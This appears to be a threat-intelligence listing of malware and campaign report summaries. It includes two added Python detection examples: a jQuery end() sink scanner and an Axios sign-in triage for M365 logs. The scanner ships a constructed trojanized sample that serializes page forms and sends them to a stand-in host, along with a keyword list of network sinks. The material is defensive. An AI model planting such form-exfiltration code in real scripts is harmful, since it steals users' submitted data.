All attack reports
Kematian-Stealer: A Deep Dive into a New Information Stealer
This report provides an in-depth analysis of a newly discovered information stealer named Kematian-Stealer, actively developed on GitHub and distributed as open-source software. The malware employs various techniques to collect sensitive data from compromised systems, evade detection, and maintain …
Downloadable IOCs 4
VasyGrek and Mr.Burns: Strong Ties in Finance
F.A.C.C.T. experts analyzed the tools and connections of cybercriminals attacking Russian accountants. An analysis of the infection chain of the VasyGrek attacker, his forum activity and his connection with the malware developer Mr.Burns is presented. The history of Mr.Burns, starting in 2010, is given,…
Downloadable IOCs 131
How do cryptocurrency drainer phishing scams work?
Cryptodrainer phishing scams have emerged as a significant threat, targeting unsuspecting individuals through deceptive tactics to steal their digital assets. These scams lure victims with promises of profits while covertly siphoning their cryptocurrency. Attackers employ social engineering techniq…
Downloadable IOCs 14
Persistent npm Campaign Shipping Trojanized jQuery
The report describes a persistent supply chain attack involving the distribution of a trojanized version of jQuery through various platforms like npm and GitHub. The malicious jQuery variant, containing a modified 'end' function, exfiltrates website form data by sending it to remote URLs controlled…
Downloadable IOCs 67
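The trojanized jQuery above is detectable without the IOCs: a genuine jQuery.fn.end is a one-line stack pop, so any network or form-serialization primitive inside that method is a red flag. The following checker is an added example (not code from the report or from the jQuery project): it brace-matches the body of `end: function(...) {...}` in a vendored jQuery file and reports sink keywords found there. The sink list, the `example.invalid` URL and both sample snippets are constructed for this example; the clean body is the one-liner jQuery 3.x ships, the trojanized body illustrates the technique described above, not the campaign's actual code.

```python
import re

# Primitives that have no business inside jQuery.fn.end (assumed list for this example).
SINKS = ("fetch(", "XMLHttpRequest", "sendBeacon", "new Image", ".src",
         "$.ajax", "jQuery.ajax", "serialize(", "http://", "https://")

def extract_end_body(source: str):
    """Return the source text between the braces of `end: function(...) {...}`, or None."""
    m = re.search(r"\bend\s*:\s*function\s*\([^)]*\)\s*\{", source)
    if not m:
        return None
    start = m.end()          # index just past the opening brace
    depth, i = 1, start
    while i < len(source) and depth:   # naive brace matching; braces inside strings would confuse it
        if source[i] == "{":
            depth += 1
        elif source[i] == "}":
            depth -= 1
        i += 1
    if depth:                # unbalanced braces: do not guess
        return None
    return source[start:i - 1]

def inspect_jquery_end(source: str) -> dict:
    """Flag an end() implementation that touches the network or serializes forms."""
    body = extract_end_body(source)
    if body is None:
        return {"found": False, "suspicious": False, "sinks": []}
    hits = [s for s in SINKS if s in body]
    return {"found": True, "suspicious": bool(hits), "sinks": hits, "body": body.strip()}

# Constructed sample 1: the genuine jQuery 3.x method body.
CLEAN_JQUERY = """
    end: function() {
        return this.prevObject || this.constructor();
    },
"""

# Constructed sample 2: an illustrative trojanized variant that posts form data
# to an attacker URL before behaving normally (not the real campaign code).
TROJANIZED = """
    end: function() {
        try {
            var d = jQuery("form").serialize();
            new Image().src = "https://example.invalid/c?" + d;
        } catch (e) {}
        return this.prevObject || this.constructor();
    },
"""

if __name__ == "__main__":
    for name, src in (("clean", CLEAN_JQUERY), ("trojanized", TROJANIZED)):
        print(name, inspect_jquery_end(src))
```

Run it over every copy of jquery*.js in your build output and node_modules; a hit on `serialize(` or a URL inside `end` is worth a manual diff against the official release, and a missing `end` altogether means the file is not a stock jQuery build.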
Decrypted: DoNex Ransomware and its Predecessors
Researchers have uncovered a cryptographic flaw in the DoNex ransomware and its previous iterations, allowing for the creation of a decryptor tool. Initially discovered in March 2024, this cryptographic weakness was made public at Recon 2024. The ransomware, which has undergone several rebrands sin…
Downloadable IOCs 8
Ticket Heist: Olympic Games and Sporting Events at Risk
This analysis examines an ongoing, undetected fraudulent campaign named 'Ticket Heist' targeting Russian-speaking users, several Eastern European countries, and English-speaking individuals seeking tickets for various sporting events and festivals. The campaign involves a network of 708 fraudulent …
Downloadable IOCs 685
Resurrecting Internet Explorer: Threat Actors Using Zero-day Tricks in Internet Shortcut File to Lure Victims (CVE-2024-38112)
Check Point Research discovered threat actors leveraging novel techniques to execute malicious code on Windows systems by exploiting Internet Explorer's vulnerabilities. The attackers utilized specially crafted .url files that, when opened, would launch IE and visit attacker-controlled URLs. Additi…
Downloadable IOCs 7
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
People's Republic of China (PRC) Ministry of State Security APT40 Tradecraft in Action
This advisory outlines the tactics, techniques, and procedures employed by the state-sponsored cyber group APT40, also known as Kryptonite Panda, GINGHAM TYPHOON, Leviathan, and Bronze Mohawk. The group, believed to be associated with the People's Republic of China's Ministry of State Security, has…
Downloadable IOCs 0
M365 adversary-in-the-middle campaign
Field Effect researchers uncovered a previously unreported campaign leveraging the Axios user agent string to facilitate business email compromise (BEC) attacks against Microsoft 365 (M365) accounts. The threat actor utilized malicious domains impersonating M365 login pages to harvest victims' cred…
Downloadable IOCs 19
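The Axios user agent is the hunting hook for this campaign: after the adversary-in-the-middle page captures a session, the attacker replays it from a script rather than a browser, so a successful M365 sign-in whose user agent begins with `axios/` stands out. The triage below is an added example (not Field Effect's tooling): it runs over constructed sign-in records shaped like Entra ID sign-in log fields (userPrincipalName, userAgent, status, ipAddress, appDisplayName), which are assumed here, and groups successful Axios sign-ins per account. All addresses and accounts are constructed.

```python
from collections import defaultdict

def is_axios_ua(user_agent: str) -> bool:
    """Axios reports itself as 'axios/<version>'; compare case-insensitively."""
    return user_agent.lower().startswith("axios/")

def flag_axios_signins(events: list[dict], allowlist: set[str] = frozenset()) -> dict[str, list[dict]]:
    """Return {account: [events]} for successful sign-ins with an Axios user agent.

    `allowlist` holds service accounts whose automation legitimately uses Axios
    (assumed tuning knob; start empty and add only after verification).
    """
    hits: dict[str, list[dict]] = defaultdict(list)
    for e in events:
        upn = e.get("userPrincipalName", "")
        if upn in allowlist:
            continue
        if e.get("status") == "success" and is_axios_ua(e.get("userAgent", "")):
            hits[upn].append(e)
    return dict(hits)

def summarize(hits: dict[str, list[dict]]) -> list[str]:
    """One line per flagged event, handy for a ticket or a Slack alert."""
    lines = []
    for upn, evs in sorted(hits.items()):
        for e in evs:
            lines.append(f"{upn}: {e['userAgent']} from {e['ipAddress']} -> {e['appDisplayName']}")
    return lines

# Constructed sign-in records (documentation IP ranges, invalid domains).
SAMPLE_EVENTS = [
    {"userPrincipalName": "alice@example.invalid", "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/126.0",
     "status": "success", "ipAddress": "198.51.100.10", "appDisplayName": "Office 365 Exchange Online"},
    {"userPrincipalName": "alice@example.invalid", "userAgent": "axios/1.6.8",
     "status": "success", "ipAddress": "203.0.113.5", "appDisplayName": "Office 365 Exchange Online"},
    {"userPrincipalName": "bob@example.invalid", "userAgent": "axios/1.6.8",
     "status": "failure", "ipAddress": "203.0.113.5", "appDisplayName": "Office 365 Exchange Online"},
    {"userPrincipalName": "carol@example.invalid", "userAgent": "python-requests/2.31.0",
     "status": "success", "ipAddress": "198.51.100.22", "appDisplayName": "Microsoft Graph"},
    {"userPrincipalName": "svc-sync@example.invalid", "userAgent": "axios/1.6.8",
     "status": "success", "ipAddress": "198.51.100.30", "appDisplayName": "Microsoft Graph"},
]

if __name__ == "__main__":
    for line in summarize(flag_axios_signins(SAMPLE_EVENTS, allowlist={"svc-sync@example.invalid"})):
        print(line)
```

Bob's failed attempt is deliberately not flagged by this function; a separate rule for repeated Axios failures against many accounts would catch the credential-replay phase. Treat a hit as a prompt to check the account's recent inbox rules and MFA registrations, which is where a BEC operator typically goes next.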
CloudSorcerer – A new APT targeting Russian government entities
In May 2024, Kaspersky discovered a sophisticated cyberespionage tool called CloudSorcerer, targeting Russian government entities. This malware leverages cloud resources like Microsoft Graph, Yandex Cloud, and Dropbox as command-and-control (C2) servers, accessing them through APIs using authentica…
Downloadable IOCs 1
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7